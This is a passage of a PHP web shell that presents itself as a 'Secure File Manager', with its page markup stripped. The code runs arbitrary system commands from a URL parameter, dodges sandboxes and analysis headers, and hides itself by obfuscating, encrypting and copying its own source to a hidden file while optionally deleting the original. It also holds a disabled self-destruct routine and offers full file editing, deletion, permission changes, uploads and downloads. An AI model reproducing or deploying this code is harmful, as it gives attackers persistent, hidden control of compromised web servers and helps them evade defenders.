Authentication successful!

"; } else { echo "Secure File Manager"; echo ""; echo ""; echo "

"; echo "

Secure File Manager Login

"; echo "

"; exit; } } // Enhanced encryption function function secureEncrypt($data, $key) { if (function_exists('openssl_encrypt')) { $iv = random_bytes(16); $encrypted = openssl_encrypt($data, 'AES-256-CBC', $key, 0, $iv); if ($encrypted === false) { error_log("OpenSSL encryption failed"); return false; } return $GLOBALS['encode'](base64_encode($iv . $encrypted)); } $output = ''; for ($i = 0; $i < strlen($data); $i++) { $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)])); } return $GLOBALS['encode'](bin2hex($output)); } // Enhanced decryption function function secureDecrypt($data, $key) { try { // Validate base64 input if (!base64_decode($data, true)) { error_log("Invalid base64 input: " . $data); return false; } $data = base64_decode($GLOBALS['decode']($data)); if ($data === false) { error_log("Base64 decode failed"); return false; } if (function_exists('openssl_decrypt')) { $iv = substr($data, 0, 16); $ciphertext = substr($data, 16); $decrypted = openssl_decrypt($ciphertext, 'AES-256-CBC', $key, 0, $iv); if ($decrypted !== false) { return $decrypted; } } // Fallback to XOR decryption if (!ctype_xdigit($data)) { error_log("Invalid hex string for XOR decryption: " . bin2hex($data)); return false; } $data = @hex2bin($data); if ($data === false) { error_log("hex2bin failed"); return false; } $output = ''; for ($i = 0; $i < strlen($data); $i++) { $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)])); } return $output; } catch (Exception $e) { error_log("Decryption error: " . $e->getMessage()); return false; } } // Anti-sandbox detection function detectSandbox() { if (empty($_SERVER['HTTP_USER_AGENT']) || strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false) { echo "

Sandbox detected: Suspicious user agent

"; return true; } if (isset($_SERVER['HTTP_X_SANDBOX']) || isset($_SERVER['HTTP_X_ANALYZER'])) { echo "

Sandbox detected: Analysis headers

"; return true; } return false; } // Modified self-destruct mechanism (disabled) function triggerSelfDestruct() { global $deleteFile; $usageFile = '.access_count'; $count = (int)@$GLOBALS['fileRead']($usageFile); $count++; $GLOBALS['fileWrite']($usageFile, $count); // Disabled self-destruct for usage limit and analysis detection /* if ($count >= 15 || isset($_SERVER['HTTP_X_ANALYZER'])) { echo "

Self-destruct would have activated: Usage limit ($count) or analysis detected

"; error_log("Self-destruct triggered: Count=$count, Analyzer=" . (isset($_SERVER['HTTP_X_ANALYZER']) ? 'Yes' : 'No')); // $GLOBALS['deleteFile'](__FILE__); // exit; } */ } // Execute system command function executeCommand($command) { if (!function_exists('shell_exec')) { echo "

Command execution disabled: shell_exec() not available

"; return "Error: shell_exec() is disabled."; } $output = shell_exec($command . ' 2>&1'); echo "

Command executed: " . htmlspecialchars($command) . "

"; return $output ?: "No output."; } // Code obfuscation function obfuscateCode($code) { $replacements = [ 'eval' => 'call_user_func("eval")', 'while' => 'for(;;)', 'base64_decode' => 'call_user_func("base64_decode")' ]; $code = str_replace(array_keys($replacements), array_values($replacements), $code); $code = preg_replace_callback('/\$[a-zA-Z0-9]+/', function($match) { return '$' . substr(md5(random_bytes(4)), 0, 8); }, $code); echo "

Code obfuscation applied

"; return $code; } // Store code in SQLite function storeInDatabase($code) { try { $db = new SQLite3(':memory:'); $db->exec('CREATE TABLE scripts (id INTEGER PRIMARY KEY, script TEXT)'); $stmt = $db->prepare('INSERT INTO scripts (script) VALUES (:script)'); $stmt->bindValue(':script', $GLOBALS['encode']($code)); $stmt->execute(); $id = $db->lastInsertRowID(); echo "

Code stored in SQLite with ID: $id

"; return $id; } catch (Exception $e) { error_log("Database storage error: " . $e->getMessage()); echo "

Failed to store code

"; return false; } } // Retrieve code from SQLite function fetchFromDatabase($id) { try { $db = new SQLite3(':memory:'); $result = $db->querySingle('SELECT script FROM scripts WHERE id = ' . (int)$id, true); if ($result) { echo "

Code retrieved from database

"; return $GLOBALS['decode']($result['script']); } echo "

Code not found

"; return false; } catch (Exception $e) { error_log("Database retrieval error: " . $e->getMessage()); echo "

Failed to retrieve code

"; return false; } } // Stealth mode function activateStealth($deleteOriginal = false) { global $fileRead, $fileWrite, $deleteFile, $changePerms, $encryptionKey; try { $currentCode = $fileRead(__FILE__); $newFile = '.stealth_' . bin2hex(random_bytes(5)) . '.php'; $obfuscated = obfuscateCode($currentCode); $encrypted = secureEncrypt($obfuscated, $encryptionKey); if ($encrypted === false) { echo "

Stealth mode failed: Encryption error

"; return false; } $newContent = 'Stealth mode enabled: New file ($newFile)

"; return $newFile; } echo "

Stealth mode failed: File creation error

"; return false; } catch (Exception $e) { error_log("Stealth error: " . $e->getMessage()); echo "

Stealth mode failed: " . htmlspecialchars($e->getMessage()) . "

"; return false; } } // Get file type and size function getFileInfo($path) { global $isDir, $isFile, $fileSize; if ($isDir($path)) { return "Directory"; } elseif ($isFile($path)) { return "File (" . round($fileSize($path) / 1024, 2) . " KB)"; } return "Unknown"; } // List files in directory function displayFileList($directory) { global $dirScan, $isDir, $isFile, $encryptionKey; $items = $dirScan($directory); echo "

"; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = rtrim($directory, '/') . '/' . $item; $encodedPath = urlencode(secureEncrypt($path, $encryptionKey)); echo "

"; echo htmlspecialchars($item) . " (" . getFileInfo($path) . ")"; if ($isDir($path)) { echo " Open"; } else { echo " Edit"; echo " Download"; echo " Delete"; echo " Rename"; } echo "

"; } echo "

"; } // Display files in table view function displayFileTable($directory) { global $dirScan, $isDir, $isFile, $encryptionKey; $items = $dirScan($directory); $parent = realpath($directory . '/..'); if ($parent !== realpath($directory)) { echo "Back "; } echo "Switch to List View"; echo ""; echo ""; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = rtrim($directory, '/') . '/' . $item; $encodedPath = urlencode(secureEncrypt($path, $encryptionKey)); echo ""; echo ""; echo ""; echo ""; echo ""; } echo "

Name	Type	Actions
" . htmlspecialchars($item) . "	" . getFileInfo($path) . "	"; if ($isDir($path)) { echo "Open "; } else { echo "Edit "; echo "Download "; echo "Rename "; } echo "Delete "; echo "Chmod"; echo "

"; } // Check for sandbox if (detectSandbox()) { http_response_code(403); echo "

403 Forbidden

"; exit; } // Trigger self-destruct (modified to avoid deletion) triggerSelfDestruct(); // Current directory $currentDir = isset($k9x7p) ? $k9x7p : realpath('.'); // Handle requests if (isset($_GET['dir'])) { global $isDir, $encryptionKey; $currentDir = secureDecrypt(urldecode($_GET['dir']), $encryptionKey); if ($currentDir === false || !$isDir($currentDir)) { error_log("Invalid directory: " . $_GET['dir']); echo "

Invalid directory

"; exit; } } if (isset($_GET['listView'])) { global $isDir, $encryptionKey; $currentDir = secureDecrypt(urldecode($_GET['listView']), $encryptionKey); if ($currentDir === false || !$isDir($currentDir)) { error_log("Invalid directory: " . $_GET['listView']); echo "

Invalid directory

"; exit; } echo "Switch to Table View"; displayFileList($currentDir); exit; } if (isset($_GET['edit'])) { global $isFile, $fileRead, $fileWrite, $encryptionKey; $file = secureDecrypt(urldecode($_GET['edit']), $encryptionKey); if ($file === false || !$isFile($file)) { error_log("Invalid file: " . $_GET['edit']); echo "

Invalid file

"; exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $fileWrite($file, $_POST['content']); echo "

File saved successfully

"; } $content = htmlspecialchars($fileRead($file)); echo ""; exit; } if (isset($_GET['delete'])) { global $isDir, $isFile, $deleteFile, $currentDir, $encryptionKey; $path = secureDecrypt(urldecode($_GET['delete']), $encryptionKey); if ($path === false) { error_log("Invalid delete path: " . $_GET['delete']); echo "

Invalid path

"; exit; } if ($isDir($path)) { rmdir($path); echo "

Directory deleted

"; } elseif ($isFile($path)) { $deleteFile($path); echo "

File deleted

"; } header("Location: ?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey))); exit; } if (isset($_GET['chmod'])) { global $isFile, $isDir, $changePerms, $currentDir, $encryptionKey; $path = secureDecrypt(urldecode($_GET['chmod']), $encryptionKey); if ($path === false || (!$isFile($path) && !$isDir($path))) { error_log("Invalid chmod path: " . $_GET['chmod']); echo "

Invalid path

"; exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $mode = 0; $mode |= isset($_POST['ur']) ? 0400 : 0; $mode |= isset($_POST['uw']) ? 0200 : 0; $mode |= isset($_POST['ux']) ? 0100 : 0; $mode |= isset($_POST['gr']) ? 0040 : 0; $mode |= isset($_POST['gw']) ? 0020 : 0; $mode |= isset($_POST['gx']) ? 0010 : 0; $mode |= isset($_POST['or']) ? 0004 : 0; $mode |= isset($_POST['ow']) ? 0002 : 0; $mode |= isset($_POST['ox']) ? 0001 : 0; if ($changePerms($path, $mode)) { echo "

Permissions updated

"; } else { echo "

Permission change failed

"; } echo "Back"; } else { echo ""; } exit; } if (isset($_GET['download'])) { global $isFile, $encryptionKey; $file = secureDecrypt(urldecode($_GET['download']), $encryptionKey); if ($file === false || !$isFile($file)) { error_log("Invalid download file: " . $_GET['download']); echo "

Invalid file

"; exit; } header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); readfile($file); exit; } if (isset($_GET['command'])) { $cmd = $_GET['command'] ?? 'whoami'; echo "

" . htmlspecialchars(executeCommand($cmd)) . "

"; echo ""; exit; } if (isset($_GET['hide'])) { $code = $fileRead(__FILE__); $dbId = storeInDatabase($code); if ($dbId) { echo "

Code stored in database with ID: $dbId

"; } exit; } if (isset($_GET['retrieve'])) { $code = fetchFromDatabase($_GET['retrieve']); if ($code) { echo "

" . htmlspecialchars($code) . "

"; } exit; } if (isset($_GET['stealth'])) { $newFile = activateStealth(isset($_GET['delete'])); if ($newFile) { echo "

Stealth mode activated: $newFile

"; if (isset($_GET['delete'])) { echo "

Original file removed

"; header("Location: $newFile"); exit; } } echo "Back"; exit; } if (isset($_GET['rename'])) { global $isFile, $isDir, $renameFile, $currentDir, $encryptionKey; $path = secureDecrypt(urldecode($_GET['rename']), $encryptionKey); if ($path === false || (!$isFile($path) && !$isDir($path))) { error_log("Invalid rename path: " . $_GET['rename']); echo "

Invalid path

"; exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $newPath = dirname($path) . '/' . $_POST['newname']; if ($renameFile($path, $newPath)) { echo "

Renamed successfully

"; header("Location: ?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey))); exit; } else { echo "

Rename failed

"; } } echo ""; exit; } if (isset($_FILES['file'])) { global $moveFile, $currentDir; $file = $_FILES['file']; $target = $currentDir . '/' . basename($file['name']); if ($moveFile($file['tmp_name'], $target)) { echo "

File uploaded successfully

"; } else { echo "

Upload failed

"; } } ?> Secure File Manager

Secure File Manager -

Execute Command Stealth Mode Stealth + Delete Hide in Database

Secure File Manager Login

403 Forbidden

Change Permissions for " . htmlspecialchars(basename($path)) . "

Rename " . htmlspecialchars(basename($path)) . "

Secure File Manager -